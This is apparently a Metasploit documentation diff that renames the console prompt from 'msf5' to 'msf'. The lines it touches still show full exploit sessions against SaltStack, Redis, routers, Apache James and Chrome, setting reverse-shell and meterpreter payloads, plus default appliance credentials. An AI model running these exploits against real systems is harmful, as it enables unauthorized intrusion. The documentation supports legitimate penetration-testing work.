@@ -69,7 +69,7 @@ Active sessions 1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135) 2 shell cmd/unix 172.22.222.136:4444 -> 172.22.222.135:43791 (172.22.222.135) -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions -i 2 +msf exploit(linux/local/yum_package_manager_persistence) > sessions -i 2 [*] Starting interaction with 2... id @@ -78,7 +78,7 @@ uname -a Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux exit [*] 172.22.222.135 - Command shell session 2 closed. -msf5 exploit(linux/local/yum_package_manager_persistence) > +msf exploit(linux/local/yum_package_manager_persistence) > ``` Note: Session 2 is received after running yum update on the remote host. diff --git a/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md b/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md index 057d0ac3f6..99fa33f148 100644 --- a/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md +++ b/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md 
@@ -34,14 +34,14 @@ This option is used to specify the port on which to listen for discovery frames ### Ubuntu 18.04 x64 ``` -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33 +msf exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk +msf exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33 RHOSTS => 192.168.159.33 -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp PAYLOAD => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check +msf exploit(linux/misc/cve_2020_13160_anydesk) > check [*] 192.168.159.33:50001 - The service is running, but could not be validated. Remote hostname: ubuntu -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit +msf exploit(linux/misc/cve_2020_13160_anydesk) > exploit [*] Started reverse TCP handler on 192.168.250.87:4444 [*] Discovered the remote service (hostname: ubuntu, os: linux) diff --git a/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md b/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md index 59c1835fd3..6cde33f51e 100644 --- a/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md +++ b/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md 
@@ -24,12 +24,12 @@ ## Scenarios ``` - msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123 + msf > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123 rhosts => 10.123.123.123 - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197 + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197 lhost => 10.1.1.197 - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run [*] Started reverse TCP handler on 10.1.1.197:4444 [*] 10.123.123.123:4070 - Connecting to target diff --git a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md index 1349beeb73..df6fdf4bea 100644 --- a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md +++ b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md @@ -108,8 +108,8 @@ seconds. #### Executing Python payload on the master ``` -msf5 > use exploit/linux/misc/saltstack_salt_unauth_rce -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > show targets +msf > use exploit/linux/misc/saltstack_salt_unauth_rce +msf exploit(linux/misc/saltstack_salt_unauth_rce) > show targets Exploit targets: @@ -121,7 +121,7 @@ Exploit targets: 3 Minions (Unix command) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > options +msf exploit(linux/misc/saltstack_salt_unauth_rce) > options Module options (exploit/linux/misc/saltstack_salt_unauth_rce): 
@@ -154,11 +154,11 @@ Exploit target: 0 Master (Python payload) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5 +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5 rhosts => 172.28.128.5 -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1 +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1 lhost => 172.28.128.1 -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run +msf exploit(linux/misc/saltstack_salt_unauth_rce) > run [*] Started HTTPS reverse handler on https://172.28.128.1:8443 [*] 172.28.128.5:4506 - Using auxiliary/gather/saltstack_salt_root_key as check @@ -213,9 +213,9 @@ meterpreter > #### Executing Python payload on the minions ``` -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload) +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload) target => Minions (Python payload) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run +msf exploit(linux/misc/saltstack_salt_unauth_rce) > run [*] Started HTTPS reverse handler on https://172.28.128.1:8443 [*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506 diff --git a/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md b/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md index 05129bae00..6088695fcd 100644 --- a/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md +++ b/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md 
@@ -54,19 +54,19 @@ Payload options (linux/mipsbe/shell_reverse_tcp): ## Scenarios ``` -msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1 +msf > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1 RHOST => 192.168.0.1 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238 LHOST => 192.168.0.238 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238 SRVHOST => 192.168.0.238 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check [+] 192.168.0.1:20002 - The target is vulnerable. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > [*] Started reverse TCP handler on 192.168.0.238:4444 [*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726) [*] Starting up our web service on http://192.168.0.238:4445 ... @@ -85,7 +85,7 @@ msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > [*] Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:48112) at 2020-03-26 16:47:09 +0100 [*] Server stopped. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1 [*] Starting interaction with 1... id 
diff --git a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md index 8bd20a399e..88023ccec6 100644 --- a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md +++ b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md @@ -38,7 +38,7 @@ pre-compiled redis module to accomplish this exploit. ### set CUSTOM true (available only on linux) ``` -msf5 exploit(multi/redis/redis_replication_cmd_exec) > options +msf exploit(multi/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): @@ -67,9 +67,9 @@ Exploit target: 0 Automatic -msf5 exploit(multi/redis/redis_replication_cmd_exec) > set verbose false +msf exploit(multi/redis/redis_replication_cmd_exec) > set verbose false verbose => false -msf5 exploit(multi/redis/redis_replication_cmd_exec) > exploit +msf exploit(multi/redis/redis_replication_cmd_exec) > exploit [*] Started reverse TCP handler on 172.17.0.1:8080 [*] 127.0.0.1:6379 - Compile redis module extension file @@ -90,8 +90,8 @@ meterpreter > ### Set CUSTOM false (available on all system) ``` -msf5 > use exploit/linux/redis/redis_replication_cmd_exec -msf5 exploit(linux/redis/redis_replication_cmd_exec) > options +msf > use exploit/linux/redis/redis_replication_cmd_exec +msf exploit(linux/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): 
@@ -120,17 +120,17 @@ Exploit target: 0 Automatic -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226 +msf exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226 rhosts => 172.16.6.226 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1 +msf exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1 srvhost => 172.16.6.1 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666 +msf exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666 srvport => 6666 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1 +msf exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1 lhost => 172.16.6.1 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999 +msf exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999 lport => 9999 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > options +msf exploit(linux/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): @@ -159,7 +159,7 @@ Exploit target: 0 Automatic -msf5 exploit(linux/redis/redis_replication_cmd_exec) > exploit +msf exploit(linux/redis/redis_replication_cmd_exec) > exploit [*] Started reverse TCP handler on 172.16.6.1:9999 [*] 172.16.6.226:6379 - Listening on 172.16.6.1:6666 diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md index c14a83515c..c08e127773 100644 --- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md 
@@ -40,36 +40,36 @@ __1.__ Load the module: ``` - msf5 > use exploit/linux/smtp/apache_james_exec + msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set target 1 + msf exploit(linux/smtp/apache_james_exec) > set target 1 target => 1 - msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169 + msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169 rhosts => 192.168.224.169 - msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` - msf5 exploit(linux/smtp/apache_james_exec) > check + msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. - msf5 exploit(linux/smtp/apache_james_exec) > exploit + msf exploit(linux/smtp/apache_james_exec) > exploit [*] Started reverse TCP handler on 192.168.224.167:4444 [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload 
@@ -88,36 +88,36 @@ __1.__ Load the module: ``` - msf5 > use exploit/linux/smtp/apache_james_exec + msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set target 0 + msf exploit(linux/smtp/apache_james_exec) > set target 0 target => 0 - msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 + msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 rhosts => 192.168.224.164 - msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` - msf5 exploit(linux/smtp/apache_james_exec) > check + msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. - msf5 exploit(linux/smtp/apache_james_exec) > exploit + msf exploit(linux/smtp/apache_james_exec) > exploit [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes) ``` 
@@ -125,15 +125,15 @@ __5.__ Set up and run listener (Can be done before running exploit): ``` - msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler + msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lport 4444 + msf exploit(multi/handler) > set lport 4444 lport => 4444 - msf5 exploit(multi/handler) > set lhost 192.168.224.167 + msf exploit(multi/handler) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.224.167:4444 [*] Sending stage (3021284 bytes) to 192.168.224.164 diff --git a/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md b/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md index dbe778b0c4..a1f21ff3ab 100644 --- a/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md +++ b/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md 
@@ -30,18 +30,18 @@ You should get a session. ## Scenarios ``` -msf5 > use exploit/linux/snmp/awind_snmp_exec -msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp +msf > use exploit/linux/snmp/awind_snmp_exec +msf exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp payload => linux/armle/meterpreter/reverse_tcp -msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2 +msf exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2 RHOSTS => 192.168.100.2 -msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1 +msf exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1 LHOST => 192.168.100.1 -msf5 exploit(linux/snmp/awind_snmp_exec) > check +msf exploit(linux/snmp/awind_snmp_exec) > check [*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6) [+] 192.168.100.2:161 The target is vulnerable. -msf5 exploit(linux/snmp/awind_snmp_exec) > run +msf exploit(linux/snmp/awind_snmp_exec) > run [*] Started reverse TCP handler on 192.168.100.1:4444 [*] Using URL: http://0.0.0.0:8080/u70HALC diff --git a/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md b/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md index 14a9b2d102..ecc1f8188a 100644 --- a/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md +++ b/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md 
@@ -14,12 +14,12 @@ was not tested with those products. Setup RHOST and run it! ``` -msf5 exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121 +msf exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser +msf exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121 rhost => 10.9.8.121 -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1 +msf exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1 lhost => 10.9.8.1 -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > run +msf exploit(linux/ssh/cisco_ucs_scpuser) > run [*] 10.9.8.121:22 - Attempt to login to the Cisco appliance... [+] 10.9.8.121:22 - Login Successful (scpuser:scpuser) diff --git a/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md b/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md index efb9970726..c2eb62d920 100644 --- a/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md +++ b/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md @@ -21,7 +21,7 @@ Module defaults work very well, you should just need to set `RHOSTS`! A successful exploit will look like this: ``` -msf5 exploit(linux/ssh/ibm_drm_a3user) > run +msf exploit(linux/ssh/ibm_drm_a3user) > run [*] 10.22.22.212:22 - Attempting to login to the IBM Data Risk Manager appliance... [+] 10.22.22.212:22 - Login Successful (a3user:idrm) [*] Found shell. diff --git a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md index df5aed382a..2d4e2947dc 100644 --- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md +++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md 
@@ -82,10 +82,10 @@ You can leave this blank to use the default password. As a normal user: ``` -msf5 > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 +msf > use exploit/linux/telnet/netgear_telnetenable +msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 rhost => 192.168.1.1 -msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1 +msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1 [*] exec: ping -c 1 192.168.1.1 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. @@ -94,13 +94,13 @@ PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. --- 192.168.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms -msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1 +msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1 [*] exec: arp -an 192.168.1.1 ? (192.168.1.1) at [redacted] [ether] on wlan0 -msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted] +msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted] mac => [redacted] -msf5 exploit(linux/telnet/netgear_telnetenable) > run +msf exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:password 
@@ -125,10 +125,10 @@ Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7 As root: ``` -msf5 > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 +msf > use exploit/linux/telnet/netgear_telnetenable +msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 rhost => 192.168.1.1 -rmsf5 exploit(linux/telnet/netgear_telnetenable) > run +rmsf exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetenabled on UDP [*] 192.168.1.1:23 - Attempting to discover MAC address via ARP diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md index 8a7bfaa720..72bdcdb6ef 100644 --- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md +++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md @@ -29,7 +29,7 @@ for Crock-Pot and 49153 for other devices. ## Usage ``` -msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run +msf exploit(linux/upnp/belkin_wemo_upnp_exec) > run [*] Started reverse TCP handler on 10.22.22.4:4444 [+] Wemo-enabled device detected diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md index 9f82391e6a..5155d8b664 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md @@ -32,7 +32,7 @@ that triggers the vulnerability. ### D-link DIR-859 Firmware 1.05 ``` -msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run +msf exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://0.0.0.0:8080/38YWEX2 [*] Local IP: http://192.168.70.28:8080/38YWEX2 
diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md index 6b9c091430..1b80a37db7 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md @@ -20,7 +20,7 @@ Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned ### D-link DIR-859 Firmware 1.05 ``` -msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run +msf exploit(linux/http/dlink_dir859_exec_telnet) > run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP diff --git a/documentation/modules/exploit/multi/browser/chrome_array_map.md b/documentation/modules/exploit/multi/browser/chrome_array_map.md index abaa37582f..ef855cac92 100644 --- a/documentation/modules/exploit/multi/browser/chrome_array_map.md +++ b/documentation/modules/exploit/multi/browser/chrome_array_map.md 
@@ -32,19 +32,19 @@ Start Google Chrome without a sandbox: ```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` ``` -msf5 > use exploit/multi/browser/chrome_array_map -msf5 exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1 +msf > use exploit/multi/browser/chrome_array_map +msf exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_array_map) > set URIPATH / +msf exploit(multi/browser/chrome_array_map) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_array_map) > run +msf exploit(multi/browser/chrome_array_map) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_array_map) > +msf exploit(multi/browser/chrome_array_map) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. @@ -52,7 +52,7 @@ msf5 exploit(multi/browser/chrome_array_map) > [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800 -msf5 exploit(multi/browser/chrome_array_map) > sessions 1 +msf exploit(multi/browser/chrome_array_map) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md b/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md index 73b1815c0c..c3eed392ae 100644 
--- a/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md +++ b/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md 
@@ -34,29 +34,29 @@ Start Google Chrome without a sandbox: ```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` ``` -msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH / +msf > use exploit/multi/browser/chrome_jscreate_sideeffect +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit +msf exploit(multi/browser/chrome_jscreate_sideeffect) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > +msf exploit(multi/browser/chrome_jscreate_sideeffect) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. 
-msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > +msf exploit(multi/browser/chrome_jscreate_sideeffect) > [*] 192.168.56.3 chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/multi/browser/chrome_object_create.md b/documentation/modules/exploit/multi/browser/chrome_object_create.md index fe4094b78d..c895cfa4b7 100755 --- a/documentation/modules/exploit/multi/browser/chrome_object_create.md +++ b/documentation/modules/exploit/multi/browser/chrome_object_create.md 
@@ -53,19 +53,19 @@ Start Google Chrome without a sandbox: `"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` -msf5 > use exploit/multi/browser/chrome_object_create -msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 +msf > use exploit/multi/browser/chrome_object_create +msf exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_object_create) > set URIPATH / +msf exploit(multi/browser/chrome_object_create) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_object_create) > run +msf exploit(multi/browser/chrome_object_create) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_object_create) > +msf exploit(multi/browser/chrome_object_create) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. @@ -73,7 +73,7 @@ msf5 exploit(multi/browser/chrome_object_create) > [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800 -msf5 exploit(multi/browser/chrome_object_create) > sessions 1 +msf exploit(multi/browser/chrome_object_create) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd 
